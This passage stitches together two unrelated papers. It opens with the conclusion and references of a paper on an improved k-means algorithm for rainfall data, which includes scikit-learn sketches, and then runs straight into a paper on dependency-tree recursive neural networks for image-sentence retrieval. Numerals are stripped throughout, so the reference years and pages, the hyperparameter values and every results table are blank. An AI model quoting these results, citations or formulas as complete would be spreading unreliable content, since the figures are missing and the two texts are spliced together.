(4) if e' no longer changes, i.e., the criterion function has converged, the iteration is terminated; otherwise return to step (2). (note: e' is the criterion (measure) function.)

experiment analysis

experimental description

the data set selected for the experiment comes from the rainfall data collected in the geological hazard detection system and from the rainfall data set after artificial noise is added. the experimental environment is: intel(r) core(tm) i m cpu, gb ram, gb hard disk, windows operating system. in order to verify the validity and stability of the improved algorithm, the original k-means algorithm, the algorithm of the literature [ ] and the improved algorithm are analyzed and compared on the rainfall data set. in order to further verify the superiority of the algorithm in dealing with isolated points, the algorithm is also compared with the other algorithms on the rainfall data set with added noise. the change of the clustering criterion function and the clustering time are used to evaluate the clustering results.

experimental results and analysis

the clustering criterion function of both algorithms decreases as the cluster centers are adjusted, until final convergence; the lower and more compact the curve, the higher the accuracy of the corresponding clustering results, and vice versa. figure 2 compares how the criterion function values of the traditional k-means algorithm and the improved algorithm change as the clustering centroids are continually adjusted. in order to test the speed of the improved algorithm, three samples with different sample sizes were randomly selected from the historical data of the geological hazard system. the experimental results are shown in figure 3.

figure 2. the comparison of criterion function change trends
figure 3. the comparison of clustering times in artificial data sets

according to the comparison of the criterion function change trends on the rainfall data set in figure 2, the clustering criterion function of the improved algorithm is superior to that of the traditional k-means algorithm: because the data objects in the optimized clusters are more compact and independent in each iteration, the criterion function value is significantly lower than that of the traditional k-means algorithm, which further validates the superiority of this algorithm. figure 3 shows that the traditional k-means algorithm runs fastest, and the speed of this algorithm is slightly lower than that of the algorithm in [ ].
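the comparison carried out in this subsection can be reproduced in outline with scikit-learn, whose inertia_ attribute is exactly the criterion function e. the sketch below assumes the improved_initial_centers function from the earlier sketch; the file name, k and the threshold u are placeholders, not values taken from the paper.

```python
import numpy as np
from sklearn.cluster import KMeans

# rainfall feature matrix; the file name is a placeholder for the monitoring data export
x = np.loadtxt("rainfall_samples.csv", delimiter=",")
k, u = 4, 5   # illustrative values only

# baseline: k-means with random initialization
baseline = KMeans(n_clusters=k, init="random", n_init=10).fit(x)

# improved: centers from the variance-based splitting initialization sketched above,
# with the detected isolated points removed before clustering
centers, isolated = improved_initial_centers(x, k, u)   # function from the earlier sketch
x_clean = np.delete(x, isolated, axis=0)
improved = KMeans(n_clusters=k, init=centers, n_init=1).fit(x_clean)

# inertia_ is the criterion function e: lower values mean more compact clusters
print("criterion function e, random init  :", baseline.inertia_)
print("criterion function e, improved init:", improved.inertia_)
```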
conclusion

aiming at the instability of the clustering results caused by the random selection of initial centers in the traditional k-means algorithm and at the effect of isolated points on the clustering results, this paper exploits two properties: sample points that are a small distance apart tend to belong to the same cluster, and the cluster with the largest variance can be split into two clusters with relatively small variance. on this basis, a k-means clustering algorithm that optimizes the initial clustering centers is proposed. simulation experiments on the geological hazard system data and on artificial data sets with the same proportion of noise show that the proposed algorithm improves the accuracy and reduces the clustering error compared with the traditional k-means algorithm and the other two optimized initial-center algorithms. however, the initialization of the algorithm is somewhat complicated and takes too much time in the selection of the centers; in future work it will be further improved and tested in all respects.

references

[ ] zhai d h, yu j, gao f, et al. k-means text clustering algorithm based on initial cluster centers selection according to maximum distance [j]. application research of computers, ( ): - .
[ ] baolin yi, haiquan qiao, fan yang, chenwei xu. an improved initialization center algorithm for k-means clustering [c]. computational intelligence and software engineering, , pp: - .
[ ] redmond s j, heneghan c. a method for initializing the k-means clustering algorithm using kd-trees [j]. pattern recognition letters, , ( ): - .
[ ] liu j x, zhu g h, xi m. a k-means algorithm based on the radius [j]. journal of guilin university of electronic technology, , ( ): - .
[ ] habibpour r, khalipour k. a new k-means and k-nearest-neighbor algorithms for text document clustering [j]. international journal of academic research part a, , ( ): - .
[ ] shu-hsien liao, pei-hui chu, pei-yuan hsiao. data mining techniques and applications - a decade review from to [j]. expert systems with applications, ( ).
[ ] ying wu, chun long yao. application of improved k-means clustering algorithm in transit data collection [c]. rd international conference on biomedical engineering and informatics (bmei), .
[ ] zhou a w, yu y f. the research about clustering algorithm of k-means [j]. computer technology and development, , ( ): - .
[ ] duan g q. auto generation cloud optimization based on genetic algorithm [j]. computer and digital engineering, , ( ): - .
[ ] wang c l, zhang j x. improved k-means algorithm based on latent dirichlet allocation for text clustering [j]. journal of computer applications, , ( ): - .
[ ] deepa v k, geetha j r r. rapid development of applications in data mining [c]. green high performance computing (icghpc), , pp: - .
[ ] sharma s, agrawal j, agarwal s, et al. machine learning techniques for data mining: a survey [c]. computational intelligence and computing research (iccic), , pp: - .
[ ] mohamed abubaker, wesam ashour. efficient data clustering algorithms: improvements over k-means [j]. international journal of intelligent systems and applications (ijisa), ( ).
[ ] fahad a, alshatri n, tari z, alamri a. a survey of clustering algorithms for big data: taxonomy and empirical analysis [c]. emerging topics in computing, : - .
[ ] abubaker m, ashour wesam. efficient data clustering algorithms: improvements over k-means [j]. international journal of intelligent systems and applications, ( ): - .
[ ] tang zhaoxia, zhang hui. improved k-means clustering algorithm based on genetic algorithm[c], telkomnika indonesian journal of electrical engineering. , pp: - . [ ] optimal variable weighting for ultrametric and additive tree clustering[j]. geert soete. quality and quantity . ( ). grounded compositional semantics for finding and describing images with sentences grounded compositional semantics for finding and describing images with sentences richard socher, andrej karpathy, quoc v. le*, christopher d. manning, andrew y. ng stanford university, computer science department, *google inc. richard@socher.org, karpathy@cs.stanford.edu, qvl@google.com, manning@stanford.edu, ang@cs.stanford.edu abstract previous work on recursive neural networks (rnns) shows that these models can produce compositional feature vectors for accurately representing and classifying sentences or im- ages. however, the sentence vectors of previ- ous models cannot accurately represent visu- ally grounded meaning. we introduce the dt- rnn model which uses dependency trees to embed sentences into a vector space in order to retrieve images that are described by those sentences. unlike previous rnn-based mod- els which use constituency trees, dt-rnns naturally focus on the action and agents in a sentence. they are better able to abstract from the details of word order and syntactic expression. dt-rnns outperform other re- cursive and recurrent neural networks, kernel- ized cca and a bag-of-words baseline on the tasks of finding an image that fits a sentence description and vice versa. they also give more similar representations to sentences that describe the same image. introduction single word vector spaces are widely used (turney and pantel, ) and successful at classifying sin- gle words and capturing their meaning (collobert and weston, ; huang et al., ; mikolov et al., ). since words rarely appear in isolation, the task of learning compositional meaning repre- sentations for longer phrases has recently received a lot of attention (mitchell and lapata, ; socher et al., ; socher et al., ; grefenstette et al., ). similarly, classifying whole images into a fixed set of classes also achieves very high perfor- mance (le et al., ; krizhevsky et al., ). however, similar to words, objects in images are of- ten seen in relationships with other objects which are not adequately described by a single label. in this work, we introduce a model, illustrated in fig. , which learns to map sentences and images into a common embedding space in order to be able to retrieve one from the other. we assume word and image representations are first learned in their re- spective single modalities but finally mapped into a jointly learned multimodal embedding space. our model for mapping sentences into this space is based on ideas from recursive neural networks (rnns) (pollack, ; costa et al., ; socher et al., b). however, unlike all previous rnn models which are based on constituency trees (ct- rnns), our model computes compositional vector representations inside dependency trees. the com- positional vectors computed by this new dependency tree rnn (dt-rnn) capture more of the meaning of sentences, where we define meaning in terms of similarity to a “visual representation” of the textual description. 
dt-rnn induced vector representa- tions of sentences are more robust to changes in the syntactic structure or word order than related mod- els such as ct-rnns or recurrent neural networks since they naturally focus on a sentence’s action and its agents. we evaluate and compare dt-rnn induced rep- resentations on their ability to use a sentence such as “a man wearing a helmet jumps on his bike near a beach.” to find images that show such a scene. the goal is to learn sentence representations that capture transactions of the association for computational linguistics, ( ) – . action editor: alexander clark. submitted / ; revised / ; published / . c© association for computational linguistics. a man wearing a helmet jumps on his bike near a beach. compositional sentence vectors two airplanes parked in an airport. a man jumping his downhill bike. image vector representation a small child sits on a cement wall near white flower. multi-modal representations figure : the dt-rnn learns vector representations for sentences based on their dependency trees. we learn to map the outputs of convolutional neural networks applied to images into the same space and can then compare both sentences and images. this allows us to query images with a sentence and give sentence descriptions to images. the visual scene described and to find appropriate images in the learned, multi-modal sentence-image space. conversely, when given a query image, we would like to find a description that goes beyond a single label by providing a correct sentence describ- ing it, a task that has recently garnered a lot of at- tention (farhadi et al., ; ordonez et al., ; kuznetsova et al., ). we use the dataset intro- duced by (rashtchian et al., ) which consists of images, each with descriptions. on all tasks, our model outperforms baselines and related mod- els. related work the presented model is connected to several areas of nlp and vision research, each with a large amount of related work to which we can only do some justice given space constraints. semantic vector spaces and their composition- ality. the dominant approach in semantic vec- tor spaces uses distributional similarities of single words. often, co-occurrence statistics of a word and its context are used to describe each word (turney and pantel, ; baroni and lenci, ), such as tf-idf. most of the compositionality algorithms and related datasets capture two-word compositions. for instance, (mitchell and lapata, ) use two- word phrases and analyze similarities computed by vector addition, multiplication and others. compo- sitionality is an active field of research with many different models and representations being explored (grefenstette et al., ), among many others. we compare to supervised compositional models that can learn task-specific vector representations such as constituency tree recursive neural networks (socher et al., b; socher et al., a), chain structured recurrent neural networks and other baselines. an- other alternative would be to use ccg trees as a backbone for vector composition (k.m. hermann, ). multimodal embeddings. multimodal embed- ding methods project data from multiple sources such as sound and video (ngiam et al., ) or im- ages and text. socher et al. (socher and fei-fei, ) project words and image regions into a com- mon space using kernelized canonical correlation analysis to obtain state of the art performance in an- notation and segmentation. 
similar to our work, they use unsupervised large text corpora to learn seman- tic word representations. among other recent work is that by srivastava and salakhutdinov ( ) who developed multimodal deep boltzmann machines. similar to their work, we use techniques from the broad field of deep learning to represent images and words. recently, single word vector embeddings have been used for zero shot learning (socher et al., c). mapping images to word vectors enabled their system to classify images as depicting objects such as ”cat” without seeing any examples of this class. related work has also been presented at nips (socher et al., b; frome et al., ). this work moves zero-shot learning beyond single categories per image and extends it to unseen phrases and full length sentences, making use of similar ideas of se- mantic spaces grounded in visual knowledge. detailed image annotation. interactions be- tween images and texts is a growing research field. early work in this area includes generating single words or fixed phrases from images (duygulu et al., ; barnard et al., ) or using contextual in- formation to improve recognition (gupta and davis, ; torralba et al., ). apart from a large body of work on single object image classification (le et al., ), there is also work on attribute classification and other mid-level elements (kumar et al., ), some of which we hope to capture with our approach as well. our work is close in spirit with recent work in de- scribing images with more detailed, longer textual descriptions. in particular, yao et al. ( ) describe images using hierarchical knowledge and humans in the loop. in contrast, our work does not require hu- man interactions. farhadi et al. ( ) and kulkarni et al. ( ), on the other hand, use a more automatic method to parse images. for instance, the former ap- proach uses a single triple of objects estimated for an image to retrieve sentences from a collection written to describe similar images. it forms representations to describe object, action, and scene. kulkarni et al. ( ) extends their method to describe an im- age with multiple objects. none of these approaches have used a compositional sentence vector repre- sentation and they require specific language gener- ation techniques and sophisticated inference meth- ods. since our model is based on neural networks in- ference is fast and simple. kuznetsova et al. ( ) use a very large parallel corpus to connect images and sentences. feng and lapata ( ) use a large dataset of captioned images and experiments with both extractive (search) and abstractive (generation) models. most related is the very recent work of hodosh et al. ( ). they too evaluate using a ranking mea- sure. in our experiments, we compare to kernelized canonical correlation analysis which is the main technique in their experiments. dependency-tree recursive neural networks in this section we first focus on the dt-rnn model that computes compositional vector representations for phrases and sentences of variable length and syn- tactic type. in section the resulting vectors will then become multimodal features by mapping im- ages that show what the sentence describes to the same space and learning both the image and sen- tence mapping jointly. the most common way of building representa- tions for longer phrases from single word vectors is to simply linearly average the word vectors. 
while this bag-of-words approach can yield reasonable performance in some tasks, it gives all the words the same weight and cannot distinguish important dif- ferences in simple visual descriptions such as the bike crashed into the standing car. vs. the car crashed into the standing bike.. rnn models (pollack, ; goller and küchler, ; socher et al., b; socher et al., a) pro- vided a novel way of combining word vectors for longer phrases that moved beyond simple averag- ing. they combine vectors with an rnn in binary constituency trees which have potentially many hid- den layers. while the induced vector representations work very well on many tasks, they also inevitably capture a lot of syntactic structure of the sentence. however, the task of finding images from sentence descriptions requires us to be more invariant to syn- tactic differences. one such example are active- passive constructions which can collapse words such as “by” in some formalisms (de marneffe et al., ), relying instead on the semantic relationship of “agent”. for instance, the mother hugged her child. and the child was hugged by its mother. should map to roughly the same visual space. cur- rent recursive and recurrent neural networks do not exhibit this behavior and even bag of words rep- resentations would be influenced by the words was and by. the model we describe below focuses more on recognizing actions and agents and has the po- tential to learn representations that are invariant to active-passive differences. . dt-rnn inputs: word vectors and dependency trees in order for the dt-rnn to compute a vector repre- sentation for an ordered list of m words (a phrase or sentence), we map the single words to a vector space and then parse the sentence. first, we map each word to a d-dimensional vec- tor. we initialize these word vectors with the un- a man wearing a helmet jumps on his bike near a beach det nsubj partmod det dobj root prep poss pobj prep det pobj figure : example of a full dependency tree for a longer sentence. the dt-rnn will compute vector representations at every word that represents that word and an arbitrary number of child nodes. the final representation is computed at the root node, here at the verb jumps. note that more important activity and object words are higher up in this tree structure. supervised model of huang et al. ( ) which can learn single word vector representations from both local and global contexts. the idea is to construct a neural network that outputs high scores for windows and documents that occur in a large unlabeled corpus and low scores for window-document pairs where one word is replaced by a random word. when such a network is optimized via gradient descent the derivatives backpropagate into a word embedding matrix a which stores word vectors as columns. in order to predict correct scores the vectors in the ma- trix capture co-occurrence statistics. we use d = in all our experiments. the embedding matrix x is then used by finding the column index i of each word: [w] = i and retrieving the corresponding col- umn xw from x. henceforth, we represent an input sentence s as an ordered list of (word,vector) pairs: s = ((w ,xw ), . . . , (wm,xwm )). next, the sequence of words (w , . . . ,wm) is parsed by the dependency parser of de marneffe et al. ( ). fig. shows an example. we can represent a dependency tree d of a sentence s as an ordered list of (child,parent) indices: d(s) = {(i,j)}, where every child word in the sequence i = , . . . ,m is present and has any word j ∈ { , . . . 
,m} ∪ {0} as its parent. the root word has 0 as its parent, and we note that the same word can be a parent between zero and m times. without loss of generality, we assume that these indices form a tree structure. to summarize, the input to the dt-rnn for each sentence is the pair (s, d): the words and their vectors and the dependency tree.

forward propagation in dt-rnns

given these two inputs, we now illustrate how the dt-rnn computes parent vectors. we will use the following sentence as a running example: students_1 ride_2 bikes_3 at_4 night_5. the figure below shows its tree and the computed vector representations.

figure: example of a dt-rnn tree structure for computing a sentence representation in a bottom-up fashion; each word i is associated with a word vector x_i and a hidden vector h_i.

the dependency tree for this sentence can be summarized by the following set of (child, parent) edges: d = {(1, 2), (2, 0), (3, 2), (4, 2), (5, 4)}. the dt-rnn model will compute parent vectors at each word that include all the dependent (children) nodes in a bottom-up fashion, using a compositionality function g_\theta which is parameterized by all the model parameters \theta. to this end, the algorithm searches for nodes in the tree that either (i) have no children or (ii) whose children have already been computed, and then computes the corresponding vector. in our example, the words x_1, x_3, x_5 are leaf nodes and hence we can compute their corresponding hidden nodes via

h_c = g_\theta(x_c) = f(w_v x_c) \quad for c = 1, 3, 5,   (1)

where we compute the hidden vector at position c via our general composition function g_\theta. in the case of leaf nodes, this composition function becomes simply a linear layer, parameterized by w_v ∈ r^{n×d}, followed by a nonlinearity. we cross-validate over using no nonlinearity (f = id), tanh, sigmoid or rectified linear units (f(x) = max(0, x)), but generally find tanh to perform best.

the final sentence representation we want to compute is at h_2; however, since we still do not have h_4, we compute that one next:

h_4 = g_\theta(x_4, h_5) = f(w_v x_4 + w_{r1} h_5),   (2)

where we use the same w_v as before to map the word vector into hidden space, but we now also have a linear layer that takes as input h_5, the only child of the fourth node. the matrix w_{r1} ∈ r^{n×n} is used because node 5 is the first child node on the right side of node 4. generally, we have multiple matrices for composing with hidden child vectors from the right and left sides: w_{r·} = (w_{r1}, ..., w_{r k_r}) and w_{l·} = (w_{l1}, ..., w_{l k_l}). the number of needed matrices is determined by the data by simply finding the maximum numbers of left (k_l) and right (k_r) children any node has. if at test time a child appeared at an even larger distance (this does not happen in our test set), the corresponding matrix would be the identity matrix.

now that all children of h_2 have their hidden vectors, we can compute the final sentence representation via

h_2 = g_\theta(x_2, h_1, h_3, h_4) = f(w_v x_2 + w_{l1} h_1 + w_{r1} h_3 + w_{r2} h_4).   (3)

notice that the children are multiplied by matrices that depend on their location relative to the current node. another modification that further improves the mean rank in image search on the dev set is to weight nodes by the number of words underneath them and to normalize by the sum of words under all children. this encourages the intuitive desideratum that nodes describing longer phrases are more important. let ℓ(i) be the number of leaf nodes (words) under node i and c(i, y) be the set of child nodes of node i in dependency tree y.
the final composition function for a node vector h_i becomes

h_i = f\left( \frac{1}{ℓ(i)} \left( w_v x_i + \sum_{j \in c(i)} ℓ(j) \, w_{pos(i,j)} h_j \right) \right),   (4)

where by definition ℓ(i) = 1 + \sum_{j \in c(i)} ℓ(j), and pos(i, j) is the relative position of child j with respect to node i, e.g. l1 or r1 in eq. (3).

semantic dependency tree rnns

an alternative is to condition the weight matrices on the semantic relations given by the dependency parser. we use the collapsed tree formalism of the stanford dependency parser (de marneffe et al., ). with such a semantic untying of the weights, the dt-rnn makes better use of the dependency formalism and could give active-passive reversals similar semantic vector representations. the equation for this semantic dt-rnn (sdt-rnn) is the same as the one above, except that the matrices w_{pos(i,j)} are replaced with matrices based on the dependency relationship. the dataset contains a fixed set of unique such relationships; however, most are very rare. for examples of semantic relationships, see the model analysis section. this forward propagation can be used for computing compositional vectors; the objective function with which these are trained is explained in the multimodal mappings section.

comparison to previous rnn models

the dt-rnn has several important differences to previous rnn models of socher et al. ( a) and (socher et al., b; socher et al., c). these constituency tree rnns (ct-rnns) use the following composition function to compute a hidden parent vector h from exactly two child vectors (c_1, c_2) in a binary tree: h = f(w [c_1; c_2]), where w ∈ r^{d×2d} is the main parameter to learn. this can be rewritten to show the similarity to the dt-rnn as h = f(w_{l1} c_1 + w_{r1} c_2). however, there are several important differences.

note first that in previous rnn models the parent vectors were of the same dimensionality to be recursively compatible and be used as input to the next composition. in contrast, our new model first maps single words into a hidden space and then parent nodes are composed from these hidden vectors. this allows a higher-capacity representation, which is especially helpful for nodes that have many children. secondly, the dt-rnn allows for n-ary nodes in the tree. this is an improvement that is possible even for constituency tree ct-rnns, but it has not been explored in previous models. third, due to computing parent nodes in constituency trees, previous models had the problem that words that are merged last in the tree have a larger weight or importance in the final sentence representation. this can be problematic since these are often simple non-content words, such as a leading 'but,'. while such single words can be important for tasks such as sentiment analysis, we argue that for describing visual scenes the dt-rnn captures the more important effects: the dependency tree structures push the central content words, such as the main action or verb and its subject and object, to be merged last, and hence, by construction, the final sentence representation is more robust to less important adjectival modifiers, word order changes, etc.

figure: the architecture of the visual model. this model has sequences of filtering, pooling and local contrast normalization layers. the learnable parameters are in the filtering layers. the filters are not shared, i.e., the network is nonconvolutional.

fourth, we allow some untying of weights depending on either how far away a constituent is from the current word or what its semantic relationship is.
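to make the bottom-up computation concrete, the following numpy sketch applies the weighted composition of eq. (4) to the running example "students ride bikes at night". the dimensions, the tanh nonlinearity and the near-identity random initialization are illustrative assumptions, not the trained parameters of the model.

```python
import numpy as np

d = n = 50                    # word-vector and hidden dimensions (illustrative)
rng = np.random.default_rng(0)
f = np.tanh                   # the element-wise nonlinearity

# parameters: w_v maps a word vector into hidden space; one matrix per child position
w_v = np.eye(n, d) + 0.01 * rng.standard_normal((n, d))
w_pos = {p: np.eye(n) + 0.01 * rng.standard_normal((n, n)) for p in ("l1", "r1", "r2")}

def dtrnn_hidden(i, x, children, position):
    """h_i = f( (1/l(i)) * ( w_v x_i + sum_j l(j) w_pos(i,j) h_j ) ), as in eq. (4)."""
    total = w_v @ x[i]
    leaf_count = 1
    for j in children.get(i, []):
        h_j, l_j = dtrnn_hidden(j, x, children, position)
        total += l_j * (w_pos[position[(i, j)]] @ h_j)
        leaf_count += l_j
    return f(total / leaf_count), leaf_count

# running example "students(1) ride(2) bikes(3) at(4) night(5)", rooted at "ride"
x = {i: rng.standard_normal(d) for i in range(1, 6)}     # stand-in word vectors
children = {2: [1, 3, 4], 4: [5]}                         # from d = {(1,2),(3,2),(4,2),(5,4)}
position = {(2, 1): "l1", (2, 3): "r1", (2, 4): "r2", (4, 5): "r1"}

sentence_vector, _ = dtrnn_hidden(2, x, children, position)   # representation at the root h_2
```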
now that we can compute compositional vector representations for sentences, the next section de- scribes how we represent images. learning image representations with neural networks the image features that we use in our experiments are extracted from a deep neural network, replicated from the one described in (le et al., ). the net- work was trained using both unlabeled data (random web images) and labeled data to classify , cat- egories in imagenet (deng et al., ). we then used the features at the last layer, before the classi- fier, as the feature representation in our experiments. the dimension of the feature vector of the last layer is , . the details of the model and its training procedures are as follows. the architecture of the network can be seen in figure . the network takes x pixel images as inputs and has layers. the layers consist of three sequences of filtering, pooling and local con- trast normalization (jarrett et al., ). the pooling function is l pooling of the previous layer (taking the square of the filtering units, summing them up in a small area in the image, and taking the square- root). the local contrast normalization takes inputs in a small area of the lower layer, subtracts the mean and divides by the standard deviation. the network was first trained using an unsuper- vised objective: trying to reconstruct the input while keeping the neurons sparse. in this phase, the net- work was trained on million images randomly sampled from the web. we resized a given image so that its short dimension has pixels. we then cropped a fixed size x pixel image right at the center of the resized image. this means we may dis- card a fraction of the long dimension of the image. after unsupervised training, we used ima- genet (deng et al., ) to adjust the features in the entire network. the imagenet dataset has , categories and million images. the number of images in each category is equal across categories. the , categories are extracted from wordnet. to speed up the supervised training of this net- work, we made a simple modification to the algo- rithm described in le et al. ( ): adding a “bottle- neck” layer in between the last layer and the classi- fier. to reduce the number of connections. we added one “bottleneck” layer which has , units in be- tween the last layer of the network and the softmax layer. this newly-added layer is fully connected to the previous layer and has a linear activation func- tion. the total number of connections of this net- work is approximately . billion. the network was trained again using the super- vised objective of classifying the , classes in imagenet. most features in the networks are local, which allows model parallelism. data parallelism by asynchronous sgd was also employed as in le et al. ( ). the entire training, both unsupervised and supervised, took days on a large cluster of ma- chines. this network achieves . % precision@ on the full imagenet dataset (release fall ). we will use the features at the bottleneck layer as the feature vector z of an image. each scaled and cropped image is presented to our network. the net- work then performs a feedforward computation to compute the values of the bottleneck layer. this means that every image is represented by a fixed length vector of , dimensions. note that during training, no aligned sentence-image data was used and the imagenet classes do not fully intersect with the words used in our dataset. 
multimodal mappings

the previous two sections described how we can map sentences into a d-dimensional space and how to extract high-quality image feature vectors. we now define our final multimodal objective function for learning joint image-sentence representations with these models. our training set consists of n images with their feature vectors z_i, and each image has several sentence descriptions s_{i1}, s_{i2}, ... for which we use the dt-rnn to compute vector representations; examples from the dataset are shown in the figure in the experiments section. for training, we use a max-margin objective function which intuitively trains pairs of correct image and sentence vectors to have high inner products and incorrect pairs to have low inner products. let v_i = w_i z_i be the mapped image vector and y_{ij} = dtrnn_\theta(s_{ij}) the composed sentence vector. we define s to be the set of all sentence indices and s(i) the set of sentence indices corresponding to image i. similarly, i is the set of all image indices and i(j) is the image index of sentence j. the set p is the set of all correct image-sentence training pairs (i, j). the ranking cost function to minimize is then

j(w_i, \theta) = \sum_{(i,j) \in p} \sum_{c \in s \setminus s(i)} \max(0, \Delta - v_i^t y_j + v_i^t y_c) + \sum_{(i,j) \in p} \sum_{c \in i \setminus i(j)} \max(0, \Delta - v_i^t y_j + v_c^t y_j),   (5)

where \theta are the language composition matrices, and the two inner sums run, respectively, over sentences coming from other images and over images belonging to other sentences. the hyperparameter \Delta is the margin; it is found via cross-validation on the dev set. the final objective also includes the regularization term \lambda ( \|\theta\|^2 + \|w_i\|_f^2 ). both the visual model and the word vector learning require a very large amount of training data and both have a huge number of parameters; hence, to prevent overfitting, we assume their weights are fixed and only train the dt-rnn parameters and the image mapping w_i. if larger training corpora become available in the future, training both jointly becomes feasible and would present a very promising direction. we use a modified version of adagrad (duchi et al., ) for the optimization of both w_i and the dt-rnn, as well as for the other baselines (except kcca). adagrad has achieved good performance previously in neural network models (dean et al., ; socher et al., a). we modify it by resetting all squared gradient sums to 0 after a fixed number of epochs.

with both images and sentences in the same multimodal space, we can easily query the model for similar images or sentences by finding nearest neighbors in terms of negative inner products. an alternative objective function is based on the squared loss j(w_i, \theta) = \sum_{(i,j) \in p} \|v_i - y_j\|^2. this requires an alternating minimization scheme that first trains only w_i, then fixes w_i and trains the dt-rnn weights \theta, and then repeats this several times. we find that the performance with this objective function (paired with finding similar images using euclidean distances) is worse for all models than with the margin loss of eq. (5). in addition, kcca also performs much better using inner products in the multimodal space.

experiments

we use the dataset of rashtchian et al. ( ), which consists of a set of images that each come with several sentence descriptions; see the figure below for examples. we evaluate and compare the dt-rnn in three different experiments. first, we analyze how well the sentence vectors capture similarity in visual meaning. then we analyze image search with query sentences: we query each model with a sentence in order to find an image showing that sen-
. a woman and her dog watch the cameraman in their living with wooden floors. .
a woman sitting on the couch while a black faced dog runs across the floor. . a woman wearing a backpack sits on a couch while a small dog runs on the hardwood floor next to her. . a women sitting on a sofa while a small jack russell walks towards the camera. . white and black small dog walks toward the camera while woman sits on couch, desk and computer seen in the background as well as a pillow, teddy bear and moggie toy on the wood floor. . a man in a cowboy hat check approaches a small red sports car. . the back and left side of a red ferrari and two men admiring it. . the sporty car is admired by passer by. . two men next to a red sports car in a parking lot. . two men stand beside a red sports car. figure : examples from the dataset of images and their sentence descriptions (rashtchian et al., ). sentence length varies greatly and different objects can be mentioned first. hence, models have to be invariant to word ordering. tence’s visual ‘meaning.’ the last experiment de- scribing images by finding suitable sentences does the reverse search where we query the model with an image and try to find the closest textual description in the embedding space. in our comparison to other methods we focus on those models that can also compute fixed, continu- ous vectors for sentences. in particular, we compare to the rnn model on constituency trees of socher et al. ( a), a standard recurrent neural network; a simple bag-of-words baseline which averages the words. all models use the word vectors provided by huang et al. ( ) and do not update them as dis- cussed above. models are trained with their corre- sponding gradients and backpropagation techniques. a standard recurrent model is used where the hidden vector at word index t is computed from the hidden vector at the previous time step and the current word vector: ht = f(whht− + wxxt). during training, we take the last hidden vector of the sentence chain and propagate the error into that. it is also this vector that is used to represent the sentence. other possible comparisons are to the very differ- ent models mentioned in the related work section. these models use a lot more task-specific engineer- ing, such as running object detectors with bounding boxes, attribute classifiers, scene classifiers, crfs for composing the sentences, etc. another line of work uses large sentence-image aligned resources (kuznetsova et al., ), whereas we focus on eas- ily obtainable training data of each modality sepa- rately and a rather small multimodal corpus. in our experiments we split the data into train- ing, development and test images. since there are sentences describing each image, we have training sentences and testing sen- tences. the dataset has unique words, half of which only appear once. hence, the unsupervised, pre-trained semantic word vector representations are crucial. word vectors are not fine tuned during train- ing. hence, the main parameters are the dt-rnn’s wl·,wr· or the semantic matrices of which there are and the image mapping wi. for both dt-rnns the weight matrices are initialized to block identity matrices plus gaussian noise. word vectors and hid- den vectors are set o length . using the develop- ment split, we found λ = . and the learning rate of adagrad to . . the best model uses a mar- gin of ∆ = . inspired by socher and fei-fei ( ) and ho- dosh et al. ( ) we also compare to kernelized canonical correlation analysis (kcca). we use the average of word vectors for describing sentences and the same powerful image vectors as before. 
we use the code of socher and fei-fei ( ). tech- nically, one could combine the recently introduced deep cca andrew et al. ( ) and train the re- cursive neural network architectures with the cca objective. we leave this to future work. with lin- ear kernels, kcca does well for image search but is worse for sentence self similarity and describing images with sentences close-by in embedding space. all other models are trained by replacing the dt- rnn function in eq. . . similarity of sentences describing the same image in this experiment, we first map all sentences from the test set into the multi-modal space. then for each sentence, we find the nearest neighbor sen- sentences similarity for image model mean rank random . bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . image search model mean rank random . bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . describing images model mean rank random . bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . table : left: comparison of methods for sentence similarity judgments. lower numbers are better since they indicate that sentences describing the same image rank more highly (are closer). the ranks are out of the sentences in the test set. center: comparison of methods for image search with query sentences. shown is the average rank of the single correct image that is being described. right: average rank of a correct sentence description for a query image. tences in terms of inner products. we then sort these neighbors and record the rank or position of the nearest sentence that describes the same im- age. if all the images were very unique and the vi- sual descriptions close-paraphrases and consistent, we would expect a very low rank. however, usually a handful of images are quite similar (for instance, there are various images of airplanes flying, parking, taxiing or waiting on the runway) and sentence de- scriptions can vary greatly in detail and specificity for the same image. table (left) shows the results. we can see that averaging the high quality word vectors already cap- tures a lot of similarity. the chain structure of a standard recurrent neural net performs worst since its representation is dominated by the last words in the sequence which may not be as important as ear- lier words. . image search with query sentences this experiment evaluates how well we can find im- ages that display the visual meaning of a given sen- tence. we first map a query sentence into the vector space and then find images in the same space using simple inner products. as shown in table (center), the new dt-rnn outperforms all other models. . describing images by finding suitable sentences lastly, we repeat the above experiments but with roles reversed. for an image, we search for suitable textual descriptions again simply by finding close- by sentence vectors in the multi-modal embedding space. table (right) shows that the dt-rnn again outperforms related models. fig. assigned to im- image search model mrank bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . describing images model mrank bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . table : results of multimodal ranking when models are trained with a squared error loss and using euclidean dis- tance in the multimodal space. better performance is reached for all models when trained in a max-margin loss and using inner products as in the previous table. ages. the average ranking of . for a correct sen- tence description is out of possible sentences. 
a random assignment would give an average ranking of .

analysis: squared error loss vs. margin loss
we analyze the influence of the multimodal loss function on the performance. in addition, we compare using euclidean distances instead of inner products. table shows that performance is worse for all models in this setting.

analysis: recall at n vs mean rank
hodosh et al. ( ) and other related work use recall at n as an evaluation measure. recall at n captures how often one of the top n closest vectors was a correct image or sentence, and gives a good intuition of how a model would perform in a ranking task that presents n such results to a user. below, we compare three commonly used and high performing models, bag of words, kcca and our sdt-rnn, on this different metric. table shows that the measures do correlate well and that the sdt-rnn also performs best on the multimodal ranking tasks when evaluated with this measure.

figure : images and their sentence descriptions assigned by the dt-rnn.

table : evaluation comparison between the mean rank of the closest correct image or sentence (lower is better) and recall at different thresholds (higher is better) for bow, kcca and sdt-rnn on the image search and describing images tasks. with one exception (r@ , bottom table), the sdt-rnn outperforms the other two models and all other models we did not include here.

error analysis
in order to understand the main problems with the composed sentence vectors, we analyze the sentences that have the worst nearest neighbor rank between each other. we find that the main failure mode of the sdt-rnn occurs when a sentence that should describe the same image does not use a verb while the other sentences of that image do include a verb. for example, the following sentence pair has vectors that are very far apart from each other even though they are supposed to describe the same image: 'a blue and yellow airplane flying straight down while emitting white smoke' and 'airplane in dive position'. generally, as long as both sentences either have a verb or do not, the sdt-rnn is more robust to different sentence lengths than bag-of-words representations.
